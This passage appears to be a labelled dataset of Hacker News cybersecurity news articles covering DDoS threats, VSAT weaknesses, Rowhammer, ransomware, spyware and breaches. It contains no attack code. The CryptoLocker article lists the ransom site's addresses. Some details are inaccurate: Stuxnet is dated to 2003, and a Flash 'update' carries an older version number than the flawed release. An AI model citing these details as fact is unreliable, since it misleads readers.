This time a new hacking group, who managed to take down Tumblr this week for almost two hours, has warned gamers of launching another large-scale distributed denial-of-service (DDoS) attack against XBox Live and PlayStation networks.
Calling itself R.I.U. Star Patrol, the hacking group, posted a video on YouTube, announcing that they're planning to take down Sony's PSN and Microsoft's Xbox Live on Christmas Day by launching coordinated DDoS attacks.
""We do it because we can,"" the group said. ""We have not been paid a single dollar for what we do.""
On Wednesday, when R.I.U. Star Patrol took down Tumblr, the group contacted Mashable and explained its reason for attacking: ""There is no sinister motive. It's all for light hearted fun.""
Neither Sony nor Microsoft has yet responded to the hackers' warning.
However, both Sony and Microsoft previously promised to enhance the protection of their systems to block any attack disrupting their networks, but downtime and short outages happened almost every Christmas time.
Knowing the current abilities of hackers to launch DDoS attack that can reach 1 Tbps, it goes without saying that both the companies should be prepared to see DDoS attacks targeting its servers on this Christmas that can go beyond their expectations.
We saw coordinated DDoS attacks against DNS hosting provider Dyn last fall that broke large portions of the Internet, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
The massive DDoS attack was launched just by a botnet of an estimated 100,000 so-called Internet of Things (IoT) – everyday devices and appliances that are connected to the web – that closed down the Internet for millions of users.
So, it remains to be seen if gamers would be able to enjoy this Christmas or not.
",Cyber_Attack
Small satellite terminals (VSAT) are vulnerable to Cyber attack,https://thehackernews.com/2014/01/small-satellite-terminals-vsat-are.html,"The Military Units that rely on very small aperture terminals (VSATs) for satellite communications in remote areas are vulnerable to cyber attack.
Researchers from cyber intelligence company IntelCrawler recently identified nearly 3 million VSATs, many of them in the United States, and found that about 10,000 of them could be easily accessed because of configuration weaknesses.
""We have scanned the whole IPv4 address space since 2010 and update the results in our Big Data intelligence database, including details about the satellite operator's network ranges, such as INMARSAT, Asia Broadcast Satellite, VSAT internet iDirect, Satellite HUB Pool, and can see some vulnerabilities,""
Researchers have warned that terminals having data transmission rate 4kbps to 16 Mbps used in narrow and broadband data transmission are vulnerable to cyber attack.
VSATs are most commonly used to transmit narrowband data such as credit card, polling or RFID data or broadband data for VoIP or video using the Satellites in geosynchronous orbit generally used for Television & Radio broadcast, direct broadcast, military communication. Its name originated from the relatively small dish antenna with a diameter no longer than 10 feet (3 meters).
IntelCrawler claimed that VSAT can be easily hacked because of poor password policy & default settings. Vulnerable terminals can be used for a planned cyber-attack, to be more precise on distributed network and infrastructure.
Dan Clements, IntelCrawler's President said:
""Many VSAT devices have Telnet access with very poor password strength, many times using default factory settings,""
""Intrusions to such open devices can allow you to monitor all the network traffic related to the exact device or host, sometimes with very sensitive information, which can lead to a compromise of the internal network,""
""The door might be six inches open, and of course you're not going in, but you can see there's a vulnerability there,""
""There's a lot of information that could be used in a nefarious way,"" Clements said. ""Certainly you could put together a plan to go after certain grids or dams or power plants and have access to the centralized network at some point.""
According to the report, there are more than 313 open UHP VSAT, 9045 open terminals (HUGHES) and 1,142 terminals (SatLink), that can be easily hacked by malicious attackers.
HUGHES is one of the largest manufacturers of VSATs which are mostly used in offline ATMs by several national central banks. Physical locations of a number of VSATs can be easily searched on Google maps and Google Earth, which could allow attackers to plan more sophisticated physical attacks.
""They are also widely spread in the industrial sector, such as energy, oil and gas, where the whole infrastructure is based on distributed environments located in different regions, cities or sometimes continents. According to statistics, there are 2,931,534 active VSAT terminals in the world now, with the majority installed in the US."" according to the The Comsys VSAT report.
IntelCrawler also found network ranges of government and classified communications, e.g. Ministry of Civil Affairs of China infrastructure in ranges belongs to Shanghai VSAT Network Systems Co. LTD, and Ministry of Foreign Affairs of Turkey in Turksat VSAT Services, that poses critical threat to National Security.
",Cyber_Attack
GLitch: New 'Rowhammer' Attack Can Remotely Hijack Android Phones,https://thehackernews.com/2018/05/rowhammer-android-hacking.html,"For the very first time, security researchers have discovered an effective way to exploit a four-year-old hacking technique called Rowhammer to hijack an Android phone remotely.
Dubbed GLitch, the proof-of-concept technique is a new addition to the Rowhammer attack series which leverages embedded graphics processing units (GPUs) to carry out a Rowhammer attack against Android smartphones.
Rowhammer is a problem with recent generation dynamic random access memory (DRAM) chips in which repeatedly accessing a row of memory can cause ""bit flipping"" in an adjacent row, allowing anyone to change the value of contents stored in computer memory.
Known since at least 2012, the issue was first exploited by Google's Project Zero researchers in early 2015, when they pulled off remote Rowhammer attacks on computers running Windows and Linux.
Last year, a team of researchers in the VUSec Lab at Vrije Universiteit Amsterdam demonstrated that the Rowhammer technique could also work on Android smartphones, but with a major limitation of a malicious application being first installed on the target phone.
However, the same team of researchers has now shown how their proof-of-concept attack ""GLitch,"" can exploit the Rowhammer attack technique simply by hosting a website running malicious JavaScript code to remotely hack an Android smartphone under just 2 minutes, without relying on any software bug.
Since the malicious code runs only within the privileges of the web browser, it can spy on user's browsing pattern or steal their credentials. However, the attacker cannot gain further access to user's Android phone.
Here's How GLitch Attack Works
GLitch is the first remote Rowhammer technique that exploits the graphics processing units (GPU), which is found in almost all mobile processors, instead of the CPU that was exploited in all previous theorized versions of the Rowhammer attack.
Since the ARM processors inside Android smartphones include a type of cache that makes it difficult to access targeted rows of memory, researchers make use of GPU, whose cache can be more easily controlled, allowing hackers to hammer targeted rows without any interference.
The technique is named GLitch with first two letters capitalized because it uses a widely used browser-based graphics code library known as WebGL for rendering graphics to trigger a known glitch in DDR3 and DDR4 memory chips.
Currently, GLitch targets smartphones running the Snapdragon 800 and 801 system on a chip—that includes both CPU and GPU—meaning the PoC works only on older Android phones like the LG Nexus 5, HTC One M8, or LG G2. The attack can be launched against Firefox and Chrome.
In a video demonstration, the researchers show their JavaScript-based GLitch attack on a Nexus 5 running over Mozilla's Firefox browser to gain read/write privileges, giving them the ability to execute malicious code over the software.
""If you're wondering if we can trigger bit flips on Chrome the answer is yes, we can. As a matter of fact, most of our research was carried out on Chrome,"" the researchers said. ""We then switched to Firefox for the exploit just because we had prior knowledge of the platform and found more documentation.""
No Software Patch Can Fully Fix the Rowhammer Issue
Since Rowhammer exploits a computer hardware weakness, no software patch can completely fix the issue. Researchers say the Rowhammer threat is not only real but also has the potential to cause some real, severe damage.
Although there's no way to fully block an Android phone's GPU from tampering with the DRAM, the team has been working with Google on ways to solve the problem.
For more in-depth details on the new attack technique, you can head on to this informational page about GLitch and this paper [PDF] published by the researchers.
",Vulnerability
CryptoLocker developer launches Decryption Service website; 10 Bitcoins for Decryption Keys,https://thehackernews.com/2013/11/CryptoLocker-Ransomware-Decryption-service-malware-keys.html,"There's an extraordinary malware making rock-n-roll over the Internet and if you are one of the unlucky folks to cross its path, then it could make your computer unusable and you have to pay a few hundred Dollars to retrieve your important data back.
We have warned our readers in many previous articles about a nasty piece of Ransomware malware called 'CryptoLocker', which is targeting computers running the Microsoft Windows operating system.
The CryptoLocker Ransomware encrypts the files on a victim's computer and issues an ultimatum - Pay up or lose your data. Users who are getting infected with CryptoLocker can see a message informing them that their computer is locked up and their files encrypted. It then asks them to make a ransom payment, which typically ranges between $100 and $700 or 2 Bitcoins, to get their files back.
Just yesterday I noticed on a forum that the criminals behind the CryptoLocker malware has recently launched a dedicated CryptoLocker decryption service website that allows victims to purchase the decryption key for their infected encrypted files.
Interestingly, Malware inside the system is asking for only 2 Bitcoins ($450 USD) for the decryption keys, whereas the newly launched service price has been significantly increased 10 Bitcoins i.e. Approx $2,100 USD.
Service is available on the website https://yocmvpiarwmfgyg.net/ or https://93.189.44.187/ (Russia based hosting server) and also accessible through the Tor network https://f2d2v7soksbskekh.onion/
Why Hackers has launched the Decryption Service ?
Currently almost all antivirus companies are on Red alert about CryptoLocker malware and they have released updates for their users, that can detect and remove the infection or the registry keys from the system which is actually required to pay the ransom and decryption process. So if malware will get deleted, neither victim will get the decryption keys ever, neither criminal will get paid for it.
So the criminal actors behind the CryptoLocker malware has launched the decryption service website, which is designed to look like a customer support site for victims.
How the Decryption Service works ?
The victim can upload one of its encrypted files on the service website, which will generate an order number. After uploading, a further order status page will display the date-time of infection and victim's public key.
It will then prompt the user to purchase the private key by paying 10 Bitcoins or approximately $2,200 USD. Once a payment is made, just after the confirmation, the website will allow the user to download a decryption private key and a decrypter tool. Which can be used to decrypt all CryptoLocker encrypted files on the system.
Another interesting fact about the service website is that, if the user has already paid the ransom amount, they will provide the private key and decrypter free of cost.
CryptoLocker Ransomware, A Global threat
CryptoLocker infections were found across different regions, including Europe Middle East, North America and Asia Pacific. Almost 64% victims are from the US.
There are different ways an individual or an organization can handle the CryptoLocker threat. Unfortunately, there is no known tool to decrypt the files encrypted by CryptoLocker, so always take Backup of important Files. Always ensure your system softwares and Antivirus product is up-to-date.
Antivirus firm Bitdefender has just released a tool to protect your files from CryptoLocker. You can Download Anti-CryptoLocker here.
",Malware
FBI compromised Tor hidden service to bust largest Child Pornography Ring,https://thehackernews.com/2013/09/FBI-compromised-Tor-hidden-hosting-Child-Pornography-firefox-exploit.html,"A few days before the servers of the largest provider of Ultra Anonymous hosting were found to be serving custom malware designed to identify visitors who were using the Tor service to hide their identity online. The javascript code exploited a security vulnerability in the open-source version of Firefox that the Tor network is based on.
In an Irish court, FBI agent admitted publicly that the agency had control of Freedom Hosting, a Tor hidden service operator company, in an effort to arrest a suspect behind the largest child porn facilitator on the planet.
Eric Eoin Marques, a 28-year-old Irishman, is now awaiting extradition to the US where he could face 100 years in prison on child pornography charges.
Marques is the owner and operator of Freedom Hosting, one of the largest web hosts for the Tor network., Hosting many of the darkest hidden services on the Darknet, including criminal hacking site HackBB, money laundering services, and responsible for hosting child porn on 550 servers throughout Europe.
The FBI agent alleged when officers examined the RAM from Marques's seized computer it revealed he had made inquiries about how to get a visa and entry into Russia, and residency and citizenship there. Online searches had also been made for a US passport template and US passport hologram star.
Eric Eoin Marques apparently already sent the earnings of his profitable Freedom Hosting business to his girlfriend over in Romania.
Just two weeks ago, we have learned that the National Security Agency may have developed either decryption capabilities or secret backdoor that enabled it to break most Internet encryption.
But Taking control over all Freedom Hosting servers by FBI agents and inserting some tracking code really seems like an incredibly questionable move by any Law Enforcement agency.
",Vulnerability
"Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC",https://thehackernews.com/2012/07/security-researchers-will-disclose.html,"Security researchers are expected to disclose new vulnerabilities in near field communication (NFC), mobile baseband firmware, HTML5 and Web application firewalls next week at the Black Hat USA 2012 security conference.
The Black Hat session aim to expose sometimes shocking vulnerabilities in widely used products. They also typically show countermeasures to plug the holes.
Two independent security consultants will give a class called ""Advanced ARM exploitation,"" part of a broader five-day private class the duo developed. In a sold-out session, they will detail hardware hacks of multiple ARM platforms running Linux, some described on a separate blog posting.
The purpose of the talk is to reach a broader audience and share the more interesting bits of the research that went into developing the Practical ARM Exploitation and presenters Stephen Ridley and Stephen Lawler demonstrate how to defeat XN, ASLR, stack cookies, etc. using nuances of the ARM architecture on Linux.
In addition to mobile and Web security, Black Hat presentations will also cover security issues and attack techniques affecting industrial control systems, smart meters and embedded devices.
",Vulnerability
Massive Data Breach Exposes 6.6 Million Plaintext Passwords from Ad Company,https://thehackernews.com/2016/09/plaintext-passwords-leaked.html,"Another Day, Another Data Breach! And this time, it's worse than any recent data breaches.
Why?
Because the data breach has exposed plaintext passwords, usernames, email addresses, and a large trove of other personal information of more than 6.6 Million ClixSense users.
ClixSense, a website that claims to pay users for viewing advertisements and completing online surveys, is the latest victim to join the list of ""Mega-Breaches"" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, and Dropbox.
Hackers are Selling Plaintext Passwords and Complete Website Source Code
More than 2.2 Million people have already had their personal and sensitive data posted to PasteBin over the weekend. The hackers who dumped the data has put another 4.4 Million accounts up for sale.
In addition to un-hashed passwords and email addresses, the dump database includes first and last names, dates of birth, sex, home addresses, IP addresses, payment histories, and other banking details of Millions of users.
Troy Hunt, operator of Have I Been Pwned? breach notification service, verified the authenticity of the data taken from ClixSense.
Besides giving away 4.4 Million accounts to the highest bidder, the hackers are also offering social security numbers of compromised users, along with the complete source code of the ClixSense website and ""70,000 emails"" from the company's internal email server, according to a Pastebin message advertising the stolen database.
PasteBin has since removed the post as well as the sample of the compromised database that contained user account information.
Here's How Hackers Hacked ClixSence:
ClixSense admitted the data breach and said some unknown hackers were able to get access to its main database through an old server which the firm was no longer using, but at the time, still networked to its main database server.
After gaining access, the hacker was able ""to copy most, if not all"" of the ClixSense users table, ran SQL code to change account names to ""hacked account,"" deleted several forum posts, as well as set account balances of users to $0.00.
While talking to Ars Technica, ClixSense owner Jim Grago admitted that the database contained entries for roughly 6.6 Million accounts and that the company became aware of the breach on September 4 and managed to regain control of their DNS over the weekend.
""This all started last Sunday, September 4th about 5 am EST when my lead developer called me and said ClixSense was redirecting to a gay porn site. The hackers were able to take over our DNS and setup the redirection,"" Grago wrote.
""On Monday (Labor day) they were able to hack into our hosting provider and turned off all of our servers, hacked into our Microsoft Exchange server and changed the passwords on all of our email accounts. On Tuesday they were able to gain access to a server that was directly connected to our database server and get a copy of our users table.""
Change Your Passwords and Security Questions Now
Users are strongly advised to change their passwords for ClixSence account immediately, and it would also be a good idea to reset passwords for all of your other online services, especially those using the same passwords.
Since ClixSense uses a large trove of personal information on its users, make sure you change your security questions, if it uses any of the information you provided to ClixSense, such as your address, date of birth, or other identifying information.
Moreover, I recommend you to use a good password manager to create strong and complex passwords for your different online accounts, and it will remember all of them on your behalf.
I have listed some of the best password managers that could help you understand the importance of password manager and choose one according to your requirement.
",Data_Breaches
China-made E-Cigarette Chargers Could Infect Your Computer with Virus,https://thehackernews.com/2014/11/china-made-e-cigarette-chargers-could_26.html,"It's better for smokers to quit smoking. Are you using electronic cigarettes (E-cigarettes) instead normal ones?? Still, you should quit your smoking habit, because it not only damages your health, but could pose a danger risk to the health of your computer.
E-cigarettes have become the latest vector for hackers to distribute malicious software. E-cigarettes manufactured in China are reportedly being used to spread malware via a USB port to computers when users plug in for charging it up.
The report broke when an executive at a ""large corporation"" had been infected with malware from an undetermined source after he quit smoking and switched to e-cigarettes made in China, detailed a recent post to social news forum Reddit.
Further investigating the matter, he found that the chargers of the e-cigarettes - bought from the online auction site eBay for $5 - are hard-coded with the malware that infected his workstation despite having latest virus and anti malware programs installed.
""The executive's system was patched up to date, had antivirus and anti-malware protection,"" Reddit user Jrockilla said. ""Web logs were scoured and all attempts made to identify the source of the infection but to no avail.""
""Finally after all traditional means of infection were covered, IT started looking into other possibilities. They finally asked the executive: 'Have there been any changes in your life recently?' The executive answered: 'Well yes, I quit smoking two weeks ago and switched to e-cigarettes.' And that was the answer they were looking for.""
Rik Ferguson, a security consultant for Trend Micro, also considers the matter plausible and says, ""Production line malware has been around for a few years, infecting photo frames, MP3 players and more."" In 2008, for instance, a photo frame produced by Samsung shipped with malware on the product's install disc, the Guardian reported.
""Hackers are able to exploit any electronic device to serve malware to a poorly protected network,"" Pierluigi Paganini, chief information security officer at ID management firm, said in a blog post. ""Despite the [fact the] idea could appear hilarious, many electronic cigarettes can be charged over USB using a special cable or by inserting one end of the cigarette directly into a USB port.""
The idea is similar to the BadUSB, whose source code was released by the researchers last month on the open source code hosting website Github. BadUSB was capable to spread itself by hiding in the firmware meant to control the ways in which USB devices connect to computers. Ferguson explained that ""a very strong case can be made for enterprises disabling USB ports, or at least using device management to allow only authorised devices.""
",Malware
Hacking Team: We're Victim of a Criminal Cyber Attack,https://thehackernews.com/2015/07/hacking-team-press-statement.html,"Hacking Team, the Italy-based spyware company that sells spying software to law enforcement agencies worldwide, says the company has always operated with the law and regulation in an ethical manner.
However, there was only one Violation of Law in this entire event, and that is – ""the massive cyber attack on the Hacking Team."" company stated.
The recent hack on Hacking Team exposed nearly 500GB of massive internal documents including internal emails, hacking tools, zero-day exploits, surveillance tools, source code for Spyware and a spreadsheet listing every government client with date of purchase and amount paid.
Hacking Team Hack and Media Reports:
The attack on Hacking Team was really huge in every sense. The team finally shows its disappointment with media on its hacking incident saying, the company that helps government fight crimes is being treated as the culprits, and the criminals who attacked the company are not.
""Had a media company been attacked as Hacking Team has been, the press would be outraged,"" Hacking Team wrote in its press release Wednesday.
But, every media including us have mentioned that Hacking Team got hacked, which by default indicates that they were the victim to cyber crime.
So far, neither they nor anyone in media knows who has hacked and leaked 500GB of internal data belonging to Hacking Team.
So, what do they expect from Media to talk about?
The Unknown Hacker, about whom no one knows,
or the 500 GB of leaked Hacking Team's Secrets
Hacking Team Spyware: Fighting for Crime or aiding Surveillance?
Apart from this, the Hacking Team claimed that the strong spyware and hacking tools developed by the company are actually required by the law enforcement agencies to fight crime and terrorism.
We all know that what NSA and other government agencies are doing (espionage/surveillance) with such capabilities, instead of putting every effort to fight crime and terrorism.
Recently, a 46-year-old member of South Korea's National Intelligence Service (NIS) apparently committed suicide after it was revealed that the Asian country bought spying tools from the Hacking Team.
A Suicide note left by the agent at the scene referenced the Hacking Team controversy, and claimed his intelligence team did not use Hacking Team tools to spy on South Korean citizens' mobile phone or any other online communications.
This incident could be part of the same conspiracy, which is yet to be investigated.
Some Facts Highlighted by Hacking Team
Highlighting the facts about its recent hack attack, the company says the attackers stole and exposed the personal information of its employees and some of its clients.
However, the attackers were unable to access the data collected by company's clients using purchased spying software, as such information is only stored on the customer's systems and can't be accessed by the company itself.
The attackers also exposed some of its source code on the Internet, but according to Hacking Team, the essential elements of its source code were not compromised in the attack.
The company agreed of selling its equipments to countries, including Ethiopia, Sudan, Russia and South Korea among others, but always sold ""strictly under the law and regulation.""
""There have been reports that our software contained some sort of ""backdoor"" that permitted Hacking Team insight into the operations of our clients or the ability to disable their software,"" The company says.
""This is not true.""
""No such backdoors were ever present, and clients have been permitted to examine the source code to reassure themselves of this fact.""
The company also denied its involvement in any program that make use of airborne drones to attack computers and smartphone devices through Wi-Fi networks as it has been reported earlier this week.
",Cyber_Attack
Adobe to issue Emergency Patch for Critical Flash Player Vulnerability,https://thehackernews.com/2016/04/adobe-flash-update.html,"Adobe has been one of the favorite picks of the Hackers to mess with any systems devoid of any operating systems, as Flash Player is a front runner in all the browsers.
Hackers have already been targeting Flash Player for long by exploiting known vulnerabilities roaming in the wild.
Despite Adobe's efforts, Flash is not safe anymore for Internet security, as one more critical vulnerability had been discovered in the Flash Player that could crash the affected system and potentially allow an attacker to take control of the system.
Discovered by a French Researcher Kafeine, FireEye's Genwei Jiang, and Google's Clement Lecigne, the flaw affects Adobe Flash Player 21.0.0.197 and its earlier versions for Windows, Macintosh, Linux and Chrome OS.
The vulnerability, assigned under CVE-2016-1019, also expands back to Windows 7 and even towards Windows XP.
Adobe had also confirmed that the newly discovered vulnerability in its Flash Player is being exploited actively in the wild.
Update Adobe Flash Player Software
This issue caused the Adobe engineers to urgently work on a mitigation method and release an emergency update under Flash Player 21.0.0.182, which is expected to get released this Thursday.
Usually, Adobe releases its patch on the second Tuesday of the month, the same day as Microsoft, but rolls out emergency patches on an ad hoc basis, analyzing the seriousness of the bug.
The endless Adobe updates and upgrades had failed to ensure the user security in the real time scenario. So it's high time for users to disable or completely uninstall Adobe Flash Player.
Believe or not, Adobe Flash Player is dead and its time has passed.
In January last year, YouTube moved away from Flash for delivering videos.
Although in between Flash made an effort to beef up its security in a bid to justify its existence, things got a bit heated when Firefox became aware of a critical bug and blocked the Flash plugin entirely.
Facebook's Security Chief publicly called for Adobe to announce a kill date for Flash. In fact, Google Chrome has also begun blocking auto-playing Flash ads by default.
",Malware
Trojan.Milicenso Print Bomb - Printer Trojan cause massive printing,https://thehackernews.com/2012/06/trojanmilicenso-print-bomb-printer.html,"Trojan.Milicenso - Printer Trojan cause massive printing
A Trojan that sends printers crazy, making them print pages of garbled nonsense until all the paper has been used up, has seen a spike in activity.Symantec detected the Trojan.Milicenso across various countries, but the worst hit regions were the US and India followed by regions in South America and Europe, including the UK.
According to a blog post published Thursday by researchers from antivirus provider Symantec, Dubbed ""Trojan.Milicenso"" it has been described by security researchers as a malware delivery vehicle ""for hire"" through its repeated use since it was first discovered in 2010.
The Milicenso Trojan is actually a backdoor that is used to deliver other malware on the affected machines. The infection vectors are links and malicious attachments in unsolicited emails, as well as websites hosting malicious scripts that trigger the download of the Trojan.
""Depending on the configuration, any files, including binary files, created in that folder will trigger print jobs,"" said Symantec. ""The Trojan creates and executes a dropper executable, which in turn creates a DLL file in the %System% folder""
It's like dragging a system file into a plain-text editor: most of the time you'll see garbage. Symantec said there were a number of ways the malware can find its way onto PCs, including opening a malware-laden email attachment, through a compromised website, or posing as fake video codecs.Once the malware is opened, it redirects the user to pages to serve up adverts; a common way for malware writers to generate quick revenue.
",Malware
Researchers Uncover Spying Tool Used by Governments to Hijack all Types of Smartphones,https://thehackernews.com/2014/06/researchers-uncover-spying-tool-used-by.html,"Purchasing malware to victimize people is illegal by laws but if the same thing any government official do, then its not!! Yes, the police forces around the World are following the footsteps of U.S. National Security Agency (NSA) and FBI.
Researchers from the Citizen Lab at the Munk School of Global Affairs at the University of Toronto and computer security firm Kaspersky Lab have unearthed a broad network of controversial spyware which is specially designed to give law enforcement agencies complete access to a suspect's phone for the purpose of surveillance.
MALWARE FOR DESKTOPS AND ALL MOBILE DEVICES
The malware, dubbed as Remote Control System (RCS), also known as Da Vinci and Galileo, is developed by an Italian company known as Hacking Team, available for desktop computers, laptops, and mobile devices. The latest version of the malware works for all phone including Android, iOS, Windows Mobile, Symbian and BlackBerry devices, but best on Android devices, and can also be installed on jailbroken iOS devices. But even if the targeted iOS device is not jailbroken, the malware uses the famous Evasi0n jailbreaking tool to install the malware easily.
The team of researchers from both Citizen Lab and Kaspersky Lab in collaboration has presented their findings during an event in London. According to the report published, the diameter of the command infrastructure supporting Hacking Team, which sells the RCS to governments and law enforcement, is very vast with 326 command-and-control (C&C) servers running in more than 40 countries.
MALWARE DEVELOPERS - 'HACKING TEAM'
Hacking Team is a Milan-based IT company with more than 50 employees that has made a totally different place for itself selling ""offensive"" intrusion and surveillance software to governments and law enforcement agencies in ""several dozen countries"" on ""six continents.""
""It was a well-known fact for quite some time that the HackingTeam products included malware for mobile phones. However, these were rarely seen,"" said Kaspersky Lab experts on the blog post. ""In particular, the Android and iOS Trojans have never been identified before and represented one of the remaining blank spots in the story.""
WORLD WIDE WEB OF COMMAND-N-CONTROL SERVERS
Kaspersky Lab researchers have used a fingerprinting method to scan the entire IPv4 space and to identify the IP addresses of RCS Command & Control servers around the world and found the biggest host in United States with 64 counts of C&C servers. Next on the list was Kazakhstan with 49, Ecuador has 35, UK which hosts 32 control systems and many other countries with a grand total of 326 Command & Control servers.
""The presence of these servers in a given country doesn't mean to say they are used by that particular country's law enforcement agencies,"" said Sergey Golovanov, principal security researcher at Kaspersky Lab. ""However, it makes sense for the users of RCS to deploy C&Cs in locations they control – where there are minimal risks of cross-border legal issues or server seizures.""
ATTACK VECTOR AND MALWARE FEATURES
RCS can be physically implanted on the victim's device through a USB or SD card, and remotely it can be installed through spear phishing, exploit kits, drive-by downloads or network traffic injection.
Once installed on Apple iOS and Android device, the new module enable governments and law enforcement officers with larger capabilities to monitor victim devices, including the ability to:
control phone network
steal data from their device
record voice E-mail
intercept SMS and MMS messages
obtain call history
report on their location
use the device's microphone in real time
intercept voice and SMS messages sent via applications such as Skype, WhatsApp, Viber, and much more.
""Secretly activating the microphone and taking regular camera shots provides constant surveillance of the target—which is much more powerful than traditional cloak and dagger operations,"" Golovanov wrote.
While, the Android module is protected by an optimizer for Android called DexGuard that made the it extremely difficult to analyze. However, most of the iOS capabilities mentioned above are also available for Android, along with the support for hijacking applications such Facebook, Google Talk, Tencent of China and many more.
The mobile modules for each are custom-built for each target, researchers said. From previous disclosures we have seen that RCS is currently being used to spy on political dissidents, journalists, human rights advocates, and opposing political figures.
",Vulnerability
The Rise of Super-Stealthy Digitally Signed Malware—Thanks to the Dark Web,https://thehackernews.com/2017/11/malware-digital-certificate.html,"Guess what's more expensive than counterfeit United States passports, stolen credit cards and even guns on the dark web?
It's digital code signing certificates.
A recent study conducted by the Cyber Security Research Institute (CSRI) this week revealed that stolen digital code-signing certificates are readily available for anyone to purchase on the dark web for up to $1,200.
As you may know, digital certificates issued by a trusted certificate authority (CA) are used to cryptographically sign computer applications and software, and are trusted by your computer for execution of those programs without any warning messages.
However, malware author and hackers who are always in search of advanced techniques to bypass security solutions have been abusing trusted digital certificates during recent years.
Hackers use compromised code signing certificates associated with trusted software vendors in order to sign their malicious code, reducing the possibility of their malware being detected on targeted enterprise networks and consumer devices.
The infamous Stuxnet worm that targeted Iranian nuclear processing facilities in 2003 also used legitimate digital certificates. Also, the recent CCleaner-tainted downloads infection was made possible due to digitally-signed software update.
Stealthy Digitally-Signed Malware Is Increasingly Prevalent
However, separate research conducted by a team of security researchers have found that digitally signed malware has become much more common than previously thought.
The trio researchers—Doowon Kim, BumJun Kwon and Tudor Dumitras from the University of Maryland, College Park—said they found a total of 325 signed malware samples, of which 189 (58.2%) carried valid digital signatures while 136 carry malformed digital signatures.
""Such malformed signatures are useful for an adversary: we find that simply copying an Authenticode signature from a legitimate sample to an unsigned malware sample may help the malware bypass AV detection,"" the researchers said.
Those 189 malware samples signed correctly were generated using 111 compromised unique certificates issued by recognized CAs and used to sign legitimate software.
At the time of writing, 27 of these compromised certificates had been revoked, although malware signed by one of the remaining 84 certificates that were not revoked would still be trusted as long as carry a trusted timestamp.
""A large fraction (88.8%) of malware families rely on a single certificate, which suggests that the abusive certificates are mostly controlled by the malware authors rather than by third parties,"" the trio said.
The researchers have released a list of the abusive certificates at signedmalware.org.
Revoking Stolen Certificate Doesn't Stop Malware Immediately
Even when a signature is not valid, the researchers found that at least 34 anti-virus products failed to check the certificate's validity, eventually allowing malicious code to run on the targeted system.
The researchers also conducted an experiment to determine if malformed signatures can affect the anti-virus detections. To demonstrate this, they downloaded 5 random unsigned ransomware samples that almost all anti-virus programs detected as malicious.
The trio then took two expired certificates that previously had been used to sign both legitimate software and in-the-wild malware and used them to sign each of the five ransomware samples.
Top Antivirus Fail to Detect Malware Signed With Stolen Certificates
When analysing the resulting ten new samples, the researchers found that many anti-virus products failed to detect the malware as malicious.
The top three anti-virus products—nProtect, Tencent, and Paloalto—detected unsigned ransomware samples as malware, but considered eight of out ten crafted samples as benign.
Even popular anti-virus engines from Kaspersky Labs, Microsoft, TrendMicro, Symantec, and Commodo, failed to detect some of the known malicious samples.
Other affected anti-virus packages included CrowdStrike, Fortinet, Avira, Malwarebytes, SentinelOne, Sophos, TrendMicro and Qihoo, among others.
""We believe that this [inability in detecting malware samples] is due to the fact that AVs take digital signatures into account when filter and prioritize the list of files to scan, in order to reduce the overhead imposed on the user's host,"" the researchers said.
""However, the incorrect implementation of Authenticode signature checks in many AVs gives malware authors the opportunity to evade detection with a simple and inexpensive method.""
The researchers said they reported this issue to the affected antivirus companies, and one of them had confirmed that their product fails to check the signatures correctly and they had planned to fix the issue.
The researchers presented their findings at the Computer and Communications Security (CCS) conference in Dallas on Wednesday.
For more detailed information on the research, you can head on to their research paper [PDF] titled ""Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI.""
",Malware
North Korean Hackers Using ELECTRICFISH Tunnels to Exfiltrate Data,https://thehackernews.com/2019/05/north-korean-hacking-tool.html,"The U.S. Department of Homeland Security (DHS) and the FBI have issued another joint alert about a new piece of malware that the prolific North Korean APT hacking group Hidden Cobra has actively been using in the wild.
Hidden Cobra, also known as Lazarus Group and Guardians of Peace, is believed to be backed by North Korean government and known to launch cyber attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The hacking group was the same associated with the 2017 WannaCry ransomware menace, the 2014 Sony Pictures hack, and the SWIFT Banking attack in 2016.
Now, the DHS and the FBI have uncovered a new malware variant, dubbed ELECTRICFISH, that Hidden Cobra hackers have been using for secretly tunneling traffic out of compromised computer systems.
The malware implements a custom protocol configured with a proxy server/port and proxy username and password, allowing hackers to bypass the compromised system's required authentication to reach outside of the network.
The ElectricFish malware is a command-line utility whose primary purpose is to quickly funnel traffic between two IP addresses.
The malware allows Hidden Cobra hackers to configure with a proxy server/port and proxy username and password, making it possible to connect to a system sitting inside of a proxy server, which allows the attackers to bypass the infected system's required authentication.
""It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be funneled between two machines,"" the alert reads.
""If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.""
Once ElectricFish authenticates with the configured proxy, it immediately attempts to establish a session with the destination IP address, located outside of the victim network and the source IP address. The attack would use command prompts to specify the source and destination for tunneling traffic.
Though the US-CERT website doesn't state whether or if yes, which US organizations have already been infected with this new malware, the joint malware analysis report (MAR) does say that the alert has been issued ""to enable network defense and reduce exposure to North Korean government malicious cyber activity.""
This is not the very first time the DHS and the FBI have issued a joint alert to warn users and organizations about the Hidden Cobra malware.
Late last year, the U.S. departments warned about the FastCash malware that Hidden Cobra had been using since 2016 to compromise payment switch application servers in banks in Africa and Asia in an attempt to cash out bank ATMs.
Little less than a year ago, the DHS and the FBI also published an advisory alerting users of two different malware—a fully functional Remote Access Trojan (RAT) known as Joanap and a Server Message Block (SMB) worm called Brambul—linked to Hidden Cobra.
In 2017, the US-CERT also issued an alert detailing Hidden Cobra malware called Delta Charlie—a DDoS tool that they believed the North Korean hackers use to launch distributed denial-of-service attacks against its targets.
",Cyber_Attack
Israeli Power Grid Authority Suffers Massive Cyber Attack,https://thehackernews.com/2016/01/power-grid-cyberattack.html,"The country which built a Digital Iron Dome, Israel had undergone one of the largest serious cyber attack this year.
This time, the name of Israel is being popped up in the current headlines is for the massive cyber attack which triggered against the Nation's Electrical Power Grid Authority's Network.
""Yesterday we identified one of the largest cyber attacks that we have experienced,"" Energy Minister Yuval Steinitz confirmed at the CyberTech 2016 Conference at the Tel Aviv Trade Fair and Convention Center on Tuesday, according to an article published by The Times of Israel.
